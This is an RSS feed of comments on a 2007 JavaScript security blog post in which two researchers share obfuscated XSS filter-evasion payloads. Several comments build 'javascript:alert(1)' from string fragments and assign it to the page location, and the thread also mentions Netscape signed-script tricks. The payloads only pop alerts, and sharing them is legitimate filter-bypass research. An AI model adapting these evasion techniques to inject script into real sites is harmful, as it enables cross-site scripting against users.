<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: So you think you&#8217;re a hacker?</title>
	<atom:link href="http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/</link>
	<description>Javascript blog with messed up syntax inside</description>
	<lastBuildDate>Thu, 26 Jan 2012 01:38:34 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	
	<item>
		<title>By: Gareth Heyes</title>
		<link>http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-613</link>
		<dc:creator>Gareth Heyes</dc:creator>
		<pubDate>Tue, 18 Sep 2007 01:34:30 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-613</guid>
		<description>This one took ages cause it&#039;s really tough now with their new filters:-

s=function test2() {return &#039;hrefjavascriptalert(1)a&#039;;1,1}();
void(a = {} );
void(c = URL );
a.c=function xyz() {return c[4] }();
a.h1=function xyz() {return s[0] }();
a.h2=function xyz() {return s[1] }();
a.h3=function xyz() {return s[2] }();
a.h4=function xyz() {return s[3] }();
a.u1=function xyz() {return s[4] }();
a.u2=function xyz() {return s[5] }();
a.u3=function xyz() {return s[6] }();
a.u4=function xyz() {return s[7] }();
a.u5=function xyz() {return s[8] }();
a.u6=function xyz() {return s[9] }();
a.u7=function xyz() {return s[10] }();
a.u8=function xyz() {return s[11] }();
a.u9=function xyz() {return s[12] }();
a.u10=function xyz() {return s[13] }();
a.u11=function xyz() {return s[14] }();
a.u12=function xyz() {return s[15] }();
a.u13=function xyz() {return s[16] }();
a.u14=function xyz() {return s[17] }();
a.u15=function xyz() {return s[18] }();
a.u16=function xyz() {return s[19] }();
a.u17=function xyz() {return s[20] }();
a.u18=function xyz() {return s[21] }();
$_=function xyz() {return a.u1 + a.u2 + a.u3 + a.u4  + a.u5  + a.u6  + a.u7  + a.u8 + a.u9 + a.u10 + a.c + a.u11 + a.u12 + a.u13 + a.u14 + a.u15 + a.u16 + a.u17 + a.u18 }();
for(i in x=this) x[a.h1+a.h2+a.h3+a.h4]=$_;</description>
		<content:encoded><![CDATA[<p>This one took ages cause it&#8217;s really tough now with their new filters:-</p>
<p>s=function test2() {return &#8216;hrefjavascriptalert(1)a&#8217;;1,1}();<br />
void(a = {} );<br />
void(c = URL );<br />
a.c=function xyz() {return c[4] }();<br />
a.h1=function xyz() {return s[0] }();<br />
a.h2=function xyz() {return s[1] }();<br />
a.h3=function xyz() {return s[2] }();<br />
a.h4=function xyz() {return s[3] }();<br />
a.u1=function xyz() {return s[4] }();<br />
a.u2=function xyz() {return s[5] }();<br />
a.u3=function xyz() {return s[6] }();<br />
a.u4=function xyz() {return s[7] }();<br />
a.u5=function xyz() {return s[8] }();<br />
a.u6=function xyz() {return s[9] }();<br />
a.u7=function xyz() {return s[10] }();<br />
a.u8=function xyz() {return s[11] }();<br />
a.u9=function xyz() {return s[12] }();<br />
a.u10=function xyz() {return s[13] }();<br />
a.u11=function xyz() {return s[14] }();<br />
a.u12=function xyz() {return s[15] }();<br />
a.u13=function xyz() {return s[16] }();<br />
a.u14=function xyz() {return s[17] }();<br />
a.u15=function xyz() {return s[18] }();<br />
a.u16=function xyz() {return s[19] }();<br />
a.u17=function xyz() {return s[20] }();<br />
a.u18=function xyz() {return s[21] }();<br />
$_=function xyz() {return a.u1 + a.u2 + a.u3 + a.u4  + a.u5  + a.u6  + a.u7  + a.u8 + a.u9 + a.u10 + a.c + a.u11 + a.u12 + a.u13 + a.u14 + a.u15 + a.u16 + a.u17 + a.u18 }();<br />
for(i in x=this) x[a.h1+a.h2+a.h3+a.h4]=$_;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Gareth Heyes</title>
		<link>http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-592</link>
		<dc:creator>Gareth Heyes</dc:creator>
		<pubDate>Tue, 11 Sep 2007 10:09:52 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-592</guid>
		<description>This one&#039;s awesome :D
_=alert,1,1,_(1);</description>
		<content:encoded><![CDATA[<p>This one&#8217;s awesome <img src='http://www.thespanner.co.uk/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /><br />
_=alert,1,1,_(1);</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Ronald</title>
		<link>http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-575</link>
		<dc:creator>Ronald</dc:creator>
		<pubDate>Mon, 10 Sep 2007 01:50:11 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-575</guid>
		<description>It is here:

http://devedge-temp.mozilla.org/library/manuals/2000/javascript/1.3/guide/sec.html

Be amazed what the &#039;ol netscape can learn us, it&#039;s almost forbidden knowledge. I read the whole book over the weekend, learned tons of new and old stuff.

:D</description>
		<content:encoded><![CDATA[<p>It is here:</p>
<p><a href="http://devedge-temp.mozilla.org/library/manuals/2000/javascript/1.3/guide/sec.html" rel="nofollow">http://devedge-temp.mozilla.org/library/manuals/2000/javascript/1.3/guide/sec.html</a></p>
<p>Be amazed what the &#8216;ol netscape can learn us, it&#8217;s almost forbidden knowledge. I read the whole book over the weekend, learned tons of new and old stuff.</p>
<p> <img src='http://www.thespanner.co.uk/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Gareth Heyes</title>
		<link>http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-573</link>
		<dc:creator>Gareth Heyes</dc:creator>
		<pubDate>Sun, 09 Sep 2007 21:42:00 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-573</guid>
		<description>Found any docs on that? I would be interested to read, I tried Mozilla but there&#039;s not much stuff on it.</description>
		<content:encoded><![CDATA[<p>Found any docs on that? I would be interested to read, I tried Mozilla but there&#8217;s not much stuff on it.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Ronald</title>
		<link>http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-572</link>
		<dc:creator>Ronald</dc:creator>
		<pubDate>Sun, 09 Sep 2007 21:05:27 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-572</guid>
		<description>I meant:

import function() or var

export function() or var

Like:

function a() {

//foo

}

export a;

misleading stuff I know :)</description>
		<content:encoded><![CDATA[<p>I meant:</p>
<p>import function() or var</p>
<p>export function() or var</p>
<p>Like:</p>
<p>function a() {</p>
<p>//foo</p>
<p>}</p>
<p>export a;</p>
<p>misleading stuff I know <img src='http://www.thespanner.co.uk/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Gareth Heyes</title>
		<link>http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-571</link>
		<dc:creator>Gareth Heyes</dc:creator>
		<pubDate>Sun, 09 Sep 2007 18:42:13 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-571</guid>
		<description>Definitely an arms race, I just can&#039;t see how they can prevent all of it because we can always come up with new ways of doing things. 

Still I&#039;m impressed with their filters it isn&#039;t that easy to come up with new vectors and I&#039;ve done loads of complicated ones which don&#039;t get through.</description>
		<content:encoded><![CDATA[<p>Definitely an arms race, I just can&#8217;t see how they can prevent all of it because we can always come up with new ways of doing things. </p>
<p>Still I&#8217;m impressed with their filters it isn&#8217;t that easy to come up with new vectors and I&#8217;ve done loads of complicated ones which don&#8217;t get through.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Gareth Heyes</title>
		<link>http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-570</link>
		<dc:creator>Gareth Heyes</dc:creator>
		<pubDate>Sun, 09 Sep 2007 18:31:50 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-570</guid>
		<description>&lt;pre lang=&quot;javascript&quot;&gt;
c4=1==1&amp;&amp;&#039;(1)&#039;;c3=1==1&amp;&amp;&#039;aler&#039;;
c2=1==1&amp;&amp;&#039;:&#039;;c1=1==1&amp;&amp;&#039;javascript&#039;;
a=c1+c2+c3+&#039;t&#039;+c4;(URL=a);
&lt;/pre&gt;</description>
		<content:encoded><![CDATA[<pre lang="javascript">
c4=1==1&#038;&#038;'(1)';c3=1==1&#038;&#038;'aler';
c2=1==1&#038;&#038;':';c1=1==1&#038;&#038;'javascript';
a=c1+c2+c3+'t'+c4;(URL=a);
</pre>
]]></content:encoded>
	</item>
	<item>
		<title>By: Gareth Heyes</title>
		<link>http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-567</link>
		<dc:creator>Gareth Heyes</dc:creator>
		<pubDate>Sun, 09 Sep 2007 09:03:54 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-567</guid>
		<description>Nope didn&#039;t know that but sounds cool, I&#039;m gonna google it.</description>
		<content:encoded><![CDATA[<p>Nope didn&#8217;t know that but sounds cool, I&#8217;m gonna google it.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Ronald</title>
		<link>http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-566</link>
		<dc:creator>Ronald</dc:creator>
		<pubDate>Sat, 08 Sep 2007 22:45:29 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-566</guid>
		<description>Yeah I think this will be an endless armsrace :D

btw do you know the Javascript functions:

import() and export() ? It&#039;s pretty cool cause you can export singed script data if import is called inside a signed script. I didn&#039;t know this, there is a lot more to be learned in Javascript.</description>
		<content:encoded><![CDATA[<p>Yeah I think this will be an endless armsrace <img src='http://www.thespanner.co.uk/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>btw do you know the Javascript functions:</p>
<p>import() and export() ? It&#8217;s pretty cool cause you can export singed script data if import is called inside a signed script. I didn&#8217;t know this, there is a lot more to be learned in Javascript.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Gareth Heyes</title>
		<link>http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-565</link>
		<dc:creator>Gareth Heyes</dc:creator>
		<pubDate>Sat, 08 Sep 2007 18:43:02 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-565</guid>
		<description>Here&#039;s my favorite:-
 
&lt;pre lang=&quot;javascript&quot;&gt;
x=(this);c=1==1&amp;&amp;&#039;:&#039;;s=&#039;&#039;+/javascriptaaalerta(1)ahrefa/+&#039;&#039;;j=s[1]+s[2]+s[3]+s[4]+s[5]
+s[6]+s[7]+s[8]+s[9]+s[10]+c+s[12]+s[14]+s[15]+s[16]+s[17]+s[19]+s[20]+s[21];h=s[23]+s[24]+s[25]+s[26];x[h]=j
&lt;/pre&gt;</description>
		<content:encoded><![CDATA[<p>Here&#8217;s my favorite:-</p>
<pre lang="javascript">
x=(this);c=1==1&#038;&#038;':';s=''+/javascriptaaalerta(1)ahrefa/+'';j=s[1]+s[2]+s[3]+s[4]+s[5]
+s[6]+s[7]+s[8]+s[9]+s[10]+c+s[12]+s[14]+s[15]+s[16]+s[17]+s[19]+s[20]+s[21];h=s[23]+s[24]+s[25]+s[26];x[h]=j
</pre>
]]></content:encoded>
	</item>
</channel>
</rss>

